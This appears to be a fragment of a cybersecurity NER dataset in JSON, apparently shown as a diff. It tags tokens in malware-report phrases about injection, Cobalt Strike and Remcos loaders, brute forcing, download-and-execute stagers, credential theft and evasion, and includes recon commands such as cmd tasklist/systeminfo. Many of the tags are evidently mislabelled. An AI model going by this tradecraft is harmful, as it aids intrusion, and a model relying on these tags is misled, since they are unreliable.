"B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "/C", - "\"C:", - "&", - "cd", - "\\", - "&", - "tasklist\"" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "/C", - "\"C:", - "&", - "cd", - "\\", - "&", - "systeminfo\"" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Copying", - "of", - "files", - "across", - "SMB", - "shares" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "cmd", - "/C", - "\"C:", - "&", - "cd", - "\\", - "&", - "arp", - "-a\"" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Removal", - "of", - "artefacts", - "from", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "wmic", - "/node" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "wmic", - "/node" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "wmic", - "/node" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "wmic", - "/node" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "wmic", - "/node" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "wmic", - "/node" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "were", - "used", - "to", - "inject", - "the", - "payload", - "into", - "process", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adds", - "Run", - "Registry", - "Key", - "for", - "Persistence" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "persistence", - "technique", - "is", - "simply", - "adding", - "a", - "run", - "registry", - "key", - "for", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "added", - "to", - "the", - "startup", - "folder" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Screen", - "capture" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Screen", - "Logger" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Keylogging" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "Keylogger" - ], - "ner_tags": [ - "B-Way" - ] - }, - { - "tokens": [ - "Gathering", - "system", - "information" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "System", - "Information" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Encoded", - "shellcode", - "in", - "Project", - "File" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contained", - "encoded", - "executables", - "and", - "shellcode," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoadLibraryW,", - "VirtualAlloc,", - "CreateProccessW,", - "and", - "ZwUnmapViewOfSection." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "LoadLibraryW", - "loads", - "the", - "module,", - "VirtualAlloc", - "allocates", - "the", - "memory,", - "CreateProcessW", - "created", - "a", - "process,", - "and", - "ZwUnmapViewOfSection", - "is", - "used" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "callback", - "function", - "pointer", - "in", - "CallWindowProc" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "payload", - "from", - "the", - "project", - "files", - "was", - "a", - "remote", - "access", - "tool", - "(RAT)", - "called", - "Remcos." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "two", - "large", - "arrays", - "of", - "decimal", - "bytes", - "were", - "decoded", - "by", - "the", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decoding", - "Function" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decoding", - "function" - ], - "ner_tags": [ - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Remote", - "Command", - "Line" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Registry", - "Editor" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "stealing", - "multiple", - "types", - "of", - "data" - ], - "ner_tags": [ - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp" - ] - }, - { - "tokens": [ - "the", - "“UsingTask”", - "element", - "defines", - "the", - "task", - "that", - "will", - "be", - "compiled", - "by", - "MSBuild." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MSBuild", - "has", - "an", - "inline", - "task", - "feature" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Modify", - "and", - "query", - "the", - "Windows", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "query", - "the", - "Windows", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Log", - "keystrokes" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Bypass", - "UAC" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Egress", - "communications", - "over", - "HTTP,", - "HTTPS" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "Take", - "screenshots" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Set", - "up", - "proxies" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "payloads", - "are", - "usually", - "shellcode", - "encrypted", - "with", - "a", - "rolling", - "XOR", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "encoded", - "payload", - "has", - "been", - "located" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "project", - "file", - "has", - "an", - "encoded", - "and", - "compressed", - "payload" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "use", - "of", - "shellcode,", - "encoding,", - "compression,", - "obfuscated", - "strings" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "since", - "each", - "payload", - "will", - "be", - "encrypted", - "with", - "different", - "keys", - "and", - "each", - "configuration", - "will", - "uniquely", - "change", - "the", - "hash", - "value." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Encrypted", - "payloads", - "will", - "also", - "obfuscate", - "useful", - "strings", - "from", - "static", - "analysis." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "multiple", - "stages", - "and", - "encrypted/obfuscated", - "payloads" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "code", - "can", - "be", - "injected", - "into", - "other", - "legitimate", - "running", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "payload,", - "usually", - "shellcode,", - "is", - "injected", - "into", - "another", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "shellcode", - "is", - "then", - "executed", - "in", - "a", - "new", - "thread." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "endpoint", - "with", - "a", - "system", - "injected" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "process", - "injection" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "process", - "injection" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inject", - "malicious", - "code", - "into", - "legitimate", - "processes" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "a", - "memory-only", - "DLL", - "that", - "runs", - "as", - "a", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "pulls", - "the", - "Cobalt", - "Strike", - "payload", - "from", - "a", - "fake", - "JPG", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "also", - "leveraging", - "steganography", - "to", - "locate", - "the", - "start", - "of", - "the", - "encoded", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "uses", - "a", - "different", - "custom", - "packer" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "I-Tool", - "I-Tool" - ] - }, - { - "tokens": [ - "the", - "malware", - "to", - "unpack" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - ",", - "it", - "extracts,", - "decrypts,", - "and", - "decompresses", - "the", - "data", - "to", - "be", - "executed", - "as", - "shellcode." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "payload", - "is", - "decrypted,", - "decompressed,", - "and", - "then", - "copied", - "into", - "memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "is", - "decrypted", - "and", - "executed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decode" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "domain", - "fronting" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "or", - "download", - "additional", - "stages." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "drops", - "and", - "executes", - "Cobalt", - "Strike", - "in", - "the", - "memory", - "space", - "of", - "“rundll32.exe.”" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "This", - "requires", - "either", - "social", - "engineering", - "tactics", - "to", - "get", - "the", - "target", - "to", - "execute", - "the", - "malware", - "or", - "another", - "program/script", - "to", - "execute", - "the", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "optimize", - "brute", - "forcing", - "efforts,", - "the", - "malware", - "compares", - "the", - "server", - "prompt", - "upon", - "connection", - "to", - "a", - "hardcoded", - "list", - "of", - "strings" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "credentials", - "used", - "appear", - "to", - "be", - "default", - "credentials", - "for", - "IoT", - "devices." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "It", - "attempts", - "to", - "specifically", - "gain", - "root", - "access", - "to", - "these", - "devices", - "via", - "a", - "default", - "password" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Like", - "the", - "earlier", - "SSH", - "brute-forcing", - "campaign" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Org", - "B-Way", - "B-OffAct" - ] - }, - { - "tokens": [ - "brute-forced", - "devices" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "optimizing", - "the", - "brute", - "forcing", - "implementation" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Code", - "for", - "the", - "brute", - "forcing", - "implementation", - "is", - "significantly", - "more", - "structured" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "added", - "to", - "support", - "the", - "Telnet", - "brute", - "force." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Restart", - "Telnet", - "brute", - "forcing" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "brute", - "forcing" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "SSH", - "brute", - "forcing", - "code", - "with", - "the", - "more", - "usual", - "Telnet", - "equivalent." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Telnet", - "brute", - "forcing", - "code", - "is", - "designed", - "primarily", - "for", - "self-propagation" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SSH", - "brute-forcing", - "campaign," - ], - "ner_tags": [ - "B-Org", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "This", - "allows", - "it", - "to", - "download", - "and", - "deploy" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "are", - "downloaded", - "and", - "executed", - "in", - "the", - "victim's", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloader", - "to", - "the", - "compromised", - "device", - "that", - "executes", - "and", - "downloads", - "the", - "primary", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "downloads", - "its", - "payload", - "via", - "software", - "installed", - "on", - "the", - "compromised", - "device,", - "such", - "as", - "ftpget,", - "wget,", - "curl,", - "or", - "tftp,", - "before", - "executing", - "the", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "uses", - "the", - "cpuinfo", - "Python", - "module", - "to", - "retrieve", - "information", - "about", - "the", - "CPU." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "code", - "checks", - "if", - "the", - "disk", - "size", - "is", - "greater", - "than", - "a", - "specified", - "threshold", - "(50", - "GB", - "as", - "example)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "the", - "win32api.GetDiskFreeSpaceEx()", - "function", - "to", - "retrieve", - "the", - "disk", - "size", - "in", - "bytes" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reflective", - "PE", - "injection" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reflective", - "PE", - "injection", - "is", - "a", - "technique", - "used", - "by", - "malware", - "or", - "advanced", - "attackers", - "to", - "inject", - "a", - "Portable", - "Executable", - "(PE)", - "file", - "directly", - "into", - "the", - "memory", - "of", - "a", - "running", - "process", - "without", - "the", - "need", - "for", - "writing", - "the", - "file", - "to", - "disk" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reflective", - "PE", - "injection", - "allows", - "the", - "malware", - "to", - "load", - "and", - "execute", - "its", - "code", - "directly", - "from", - "memory" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "reflective", - "PE", - "injection,", - "the", - "PE", - "file", - "is", - "parsed", - "and", - "its", - "sections", - "are", - "reconstructed", - "in", - "the", - "target", - "process’s", - "memory." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "-ReflectivePEInjection”", - "that", - "facilitates", - "reflective", - "PE", - "injection", - "using", - "PowerShell." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "This", - "module", - "allows", - "the", - "injection", - "of", - "a", - "PE", - "file", - "into", - "a", - "remote", - "or", - "local", - "process’s", - "memory", - "without", - "writing", - "it", - "to", - "disk" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "PE", - "file", - "is", - "injected", - "and", - "reconstructed", - "in", - "memory,", - "the", - "execution", - "flow", - "can", - "be", - "redirected", - "to", - "the", - "injected", - "code,", - "enabling", - "the", - "malware", - "to", - "operate", - "within", - "the", - "context", - "of", - "the", - "compromised", - "process." - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PE", - "reflective", - "injection." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "PE", - "file", - "is", - "downloaded", - "on", - "filesystem", - "and", - "than", - "executed." - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "the", - "DownloadFile", - "method", - "of", - "the", - "WebClient", - "object", - "to", - "download", - "the", - "file", - "from", - "the", - "specified", - "URL", - "and", - "save", - "it", - "to", - "the", - "specified", - "local", - "file", - "path." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "file", - "to", - "be", - "downloaded." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "script", - "that", - "downloads", - "a", - "file", - "from", - "a", - "fixed", - "location", - "and", - "executes", - "it." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "one-liner", - "that", - "can", - "be", - "used", - "to", - "download", - "and", - "execute", - "a", - "remote", - ".ps1", - "or", - ".exe", - "file:" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "using", - "LNK", - "files", - "to", - "download", - "malware", - "or", - "other", - "malicious", - "files", - "by", - "leveraging", - "legitimate", - "native", - "apps,", - "such", - "as", - "PowerShell." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "simple", - "stager", - "download", - "of", - "an", - ".exe", - "file", - "and", - "its", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "line", - "uses", - "the", - "ShellExecute", - "method", - "of", - "the", - "Shell.Application", - "object", - "to", - "execute", - "the", - "downloaded", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Shell.Application", - "object", - "provides", - "methods", - "for", - "working", - "with", - "the", - "Windows", - "shell" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "This", - "decryption", - "process", - "utilizes", - "the", - "Fernet", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "script", - "will", - "download", - "and", - "decrypt", - "the", - "string", - "that", - "represents", - "the", - "token" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "fernet_decrypt", - "function", - "decrypts", - "an", - "encrypted", - "string" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "returns", - "the", - "decrypted", - "message", - "as", - "a", - "decoded", - "string." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "use", - "the", - "harcoded", - "password", - "for", - "decryption", - "using", - "the", - "fernet_decrypt", - "function,", - "and", - "returns", - "the", - "decrypted", - "AUTH", - "Token." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "the", - "file", - "will", - "be", - "deleted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "access", - "to", - "system", - "APIs," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "uses", - "the", - "win32api.GetDiskFreeSpaceEx()", - "function" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Fernet", - "is", - "a", - "symmetric", - "encryption", - "algorithm", - "and", - "token", - "format", - "used", - "for", - "secure", - "communication", - "and", - "data", - "protection" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "It", - "utilizes", - "symmetric", - "key", - "cryptography,", - "where", - "the", - "same", - "secret", - "key", - "is", - "used", - "for", - "both", - "encryption", - "and", - "decryption" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "this", - "code", - "comparing", - "the", - "local", - "IP", - "address", - "with", - "a", - "predefined", - "list", - "of", - "network", - "addresses" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscation", - "mechanisms", - "during", - "the", - "compilation", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "injected", - "code" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "local", - "disk", - "volumes", - "to", - "be", - "encrypted", - "are", - "also", - "configured", - "in", - "a", - "similar", - "manner." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "addition", - "to", - "file", - "encryption", - "and", - "obfuscation," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "(crawl", - "whole", - "tree),", - "I:,", - "H:,", - "G:,", - "F:,", - "E:,", - "and", - "D:." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "will", - "attempt", - "to", - "gather", - "specific,", - "sensitive", - "information", - "from", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-Purp", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "dropper", - "is", - "distributed", - "in", - "the", - "form", - "of", - "a", - "UPX-packed", - "DLL" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "then", - "abuses", - "the", - "MSDTC", - "service,", - "manipulating", - "the", - "permissions", - "and", - "startup", - "parameters." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "its", - "abuse", - "of", - "the", - "legitimate", - "MSDTC", - "service," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malicious", - "oci.dll", - "into", - "the", - "service’s", - "executable" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "its", - "attempts", - "to", - "steal", - "credentials", - "and", - "browser", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "includes", - "browser", - "session", - "and", - "credential", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Credential", - "and", - "Browser", - "Data", - "Theft" - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "checks", - "that", - "there", - "are", - "no", - "running", - "processes", - "related", - "to", - "security-related", - "software", - "(e.g.,", - "Windbg,", - "Autoruns,", - "Wireshark)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "It", - "checks", - "that", - "there", - "are", - "no", - "drivers", - "loaded", - "from", - "security-related", - "software", - "(e.g.,", - "groundling32.sys)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "checks", - "that", - "the", - "status", - "of", - "certain", - "services", - "belonging", - "to", - "security-related", - "software", - "meets", - "certain", - "conditions", - "(e.g.,", - "windefend,", - "sense,", - "cavp)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Like", - "the", - "domain,", - "the", - 